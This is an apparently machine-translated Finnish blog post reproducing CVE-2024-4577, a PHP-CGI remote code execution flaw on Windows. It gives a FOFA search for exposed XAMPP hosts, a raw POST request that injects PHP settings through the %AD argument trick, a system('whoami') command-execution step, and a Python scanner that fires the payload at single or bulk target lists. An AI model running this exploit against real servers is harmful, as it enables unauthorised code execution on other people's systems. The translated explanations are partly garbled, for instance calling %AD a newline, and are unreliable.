Teknologian jakaminen

[Vulnerability Recurrence] PHP-CGI—Best-Fit——Code Execution (CVE-2024-4577)

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

Vastuuvapauslauseke: Tämä asiakirja tai esitysmateriaali on tarkoitettu vain opetus- ja opetustarkoituksiin. Henkilöllä tai organisaatiolla, joka käyttää tämän asiakirjan tietoja laittomaan toimintaan, ei ole mitään tekemistä tämän asiakirjan kirjoittajan tai julkaisijan kanssa.

Artikkelihakemisto

Haavoittuvuuden kuvaus

PHP-CGI on käyttöliittymä PHP-skriptien suorittamiseen Web-palvelimella, joka yhdistää PHP-tulkin Web-palvelimeen CGI:n (Common Gateway Interface) kautta. PHP on suunniteltu ohittamaan merkkimuunnos WindowsissaBest-Fitominaisuus, kun PHP-CGI on käynnissä Window-alustalla ja käyttää seuraavia kieliä (yksinkertaistettu kiina 936/perinteinen kiina 950/japani 932 jne.), hyökkääjä voi luoda haitallisen pyynnön ohittaakseen CVE-2012-1823 korjaustiedoston, jolloin hyökkääjä voi ohittaa korjaustiedoston CVE-2012-1823 kirjautumatta sisään. mielivaltaisen PHP-koodin suorittaminen.

Haavoittuvuuden toistuminen

1) Tiedonkeruu
fofa:app="XAMPP"
Lisää kuvan kuvaus tähän
Olemme ryhmä kurjia, jotka aina taistelevat vaaraa ja hulluutta vastaan, mutta olemme myös vartijoita.
Lisää kuvan kuvaus tähän
2) Rakenna datapaketti

POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host:ip

<?php echo "hello world!";?>

  • 1
  • 2
  • 3
  • 4

Koodin selitys:

/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

  • 1

Tämä hyötykuorma on URL-koodattu PHP Remote Command Execution (RCE) -hyökkäysvektori, joka hyödyntää PHP CGI:n määritysvaihtoehtoja koodin etäsuorittamiseen. Seuraavassa on yksityiskohtainen selitys hyötykuormasta:

  1. /php-cgi/php-cgi.exe:

    • Tämä on pyydetty polku, joka osoittaa PHP CGI -suoritettavaan tiedostoonphp-cgi.exe . PHP CGI on web-palvelimesta riippumaton PHP-tulkki, jota käytetään tyypillisesti komentorivillä tai suoritetaan CGI-komentosarjana.

  2. URL-koodaus:

    • %ADon rivinvaihtomerkkinURL-koodausmuoto, jota käytetään tyypillisesti uusien rivien lisäämiseen URL-osoitteisiin ja jota voidaan joissain tapauksissa käyttää syötteiden suodatuksen ohittamiseen.
    • %3dJoo=URL-koodauslomake, jota käytetään arvojen määrittämiseen muuttujille.

  3. ?%ADd+cgi.force_redirect%3d0:

    • Kokeile asetusta tästäcgi.force_redirect Arvo 0 poistaa käytöstä PHP CGI:n uudelleenohjauskäyttäytymisen. Tätä käytetään yleensä estämään PHP-skriptiä hyppäämästä automaattisesti alkuperäiseen pyydettyyn URL-osoitteeseen suorituksen jälkeen.

  4. +%ADd+cgi.redirect_status_env:

    • Tämä osa voi olla asetuscgi.redirect_status_env , on PHP-kokoonpanon ohje, jota käytetään, kun PHP on käynnissä CGI- tai FastCGI-prosessina. .

  5. +allow_url_include%3d1:

    • Aseta tähänallow_url_include Arvo 1 sallii PHP-skriptien sisällyttää tiedostoja URL-osoitteista. Tämä on mahdollinen turvallisuusriski, koska sen avulla hyökkääjä voi sisällyttää etätiedostoja URL-osoitteessa välitetyn tiedostopolun kautta.

  6. +auto_prepend_file%3dphp://input:

    • perustaaauto_prepend_filevartenphp://input . Tämä asetusvaihtoehto mahdollistaa tiedoston automaattisen sisällyttämisen ennen PHP-komentosarjan suorittamista.Kun asetettuphp://input , se sisältää HTTP POST -pyynnön kautta lähetetyt tiedot. Tätä voidaan käyttää mielivaltaisen PHP-koodin suorittamiseen, koska hyökkääjä voi lähettää haitallista koodia POST-pyynnön kautta.

Rakentamalla tämän hyötykuorman hyökkääjä yrittää hyödyntää PHP CGI -määritysasetuksia suorittaakseen etäkoodia.asettamallaallow_url_includejaauto_prepend_file, hyökkääjä voi lähettää POST-pyynnön, joka sisältää PHP-koodin, joka suoritetaan automaattisesti.

Lisää kuvan kuvaus tähän
kaikuhello world, koodi jäsennetään.
3) Myös muita toimintoja voidaan suorittaa
Tilauksen toteuttaminen

<?php system('whoami');?>

  • 1

Lisää kuvan kuvaus tähän
Huomio: Tuhannet ihmiset, älkää tehkö, älkää tehkö laittomia asioita! ! !

testaustyökalut

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# 导入requests库,用于发送HTTP请求
import requests
# 导入argparse库,用于处理命令行参数
import argparse
# 从requests.exceptions导入RequestException,用于捕获请求异常
from requests.exceptions import RequestException
# 从urllib3.exceptions导入InsecureRequestWarning,用于禁用不安全请求警告
from urllib3.exceptions import InsecureRequestWarning

# 打印颜色控制字符
# 打印颜色
RED = '033[91m'
RESET = '033[0m'

# 禁用不安全请求警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def check_vulnerability(url):
    """
    检查给定URL是否存在PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)。
    
    :param url: 待检查的URL字符串
    """
    try:
        # 构造攻击URL,利用漏洞进行尝试
        attack_url = url.rstrip('/') + "//php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        # 设置请求头信息
        headers = {
            'User-Agent': 'curl/8.3.0',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        # 设置请求体数据
        payload = "<?php echo '666666';?>"
        # 向服务器发送请求
        response = requests.post(attack_url, headers=headers, data=payload, verify=False, timeout=10)
        # 检查响应,如果状态码为200且响应体包含特定字符串,则判断为存在漏洞
        if response.status_code == 200 and '666666' in response.text:
            print(f"{RED}URL [{url}] 存在PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)。{RESET}")
        else:
            print(f"URL [{url}] 未发现漏洞。")
    except RequestException as e:
        # 如果请求过程中发生异常,打印异常信息
        print(f"URL [{url}] 请求失败: {e}")

def main():
    """
    程序主入口。
    
    解析命令行参数,根据参数执行漏洞检查。
    """
    # 创建命令行参数解析器
    parser = argparse.ArgumentParser(description='检查目标URL是否存在PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)。')
    # 添加URL参数,指定目标URL
    parser.add_argument('-u', '--url', help='指定目标URL')
    # 添加文件参数,指定包含多个URL的文本文件
    parser.add_argument('-f', '--file', help='指定包含多个目标URL的文本文件')

    # 解析命令行参数
    args = parser.parse_args()

    # 如果指定了URL参数
    if args.url:
        # 如果URL未以http://或https://开头,则添加http://
        args.url = "http://" + args.url.strip("/") if not args.url.startswith(("http://", "https://")) else args.url
        # 调用漏洞检查函数
        check_vulnerability(args.url)
    # 如果指定了文件参数
    elif args.file:
        # 打开文件,读取每行作为URL进行检查
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                # 处理URL,确保其以http://或https://开头
                url = "http://" + url.strip("/") if not url.startswith(("http://", "https://")) else url
                # 调用漏洞检查函数
                check_vulnerability(url)

if __name__ == '__main__':
    main()

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82

Suorita kuvakaappaus
Lisää kuvan kuvaus tähän

Pieni lootus on juuri paljastanut terävät kulmansa, ja sen päällä on jo seissyt sudenkorento.

Henkilökohtainen profiili

Hän on omistautunut teknologian tutkimukselle yli 30 vuoden ajan ja hallitsee useita kieliä, kuten java, linux, javascript, php, css jne. Hän on tehnyt paljon työtä avoimen lähdekoodin alalla Kehittäjän dokumentaatioasema, jossa voit jakaa joitakin teknologian kehittämisen ongelmia myöhempää käyttöä varten

yhteystietoni

Mail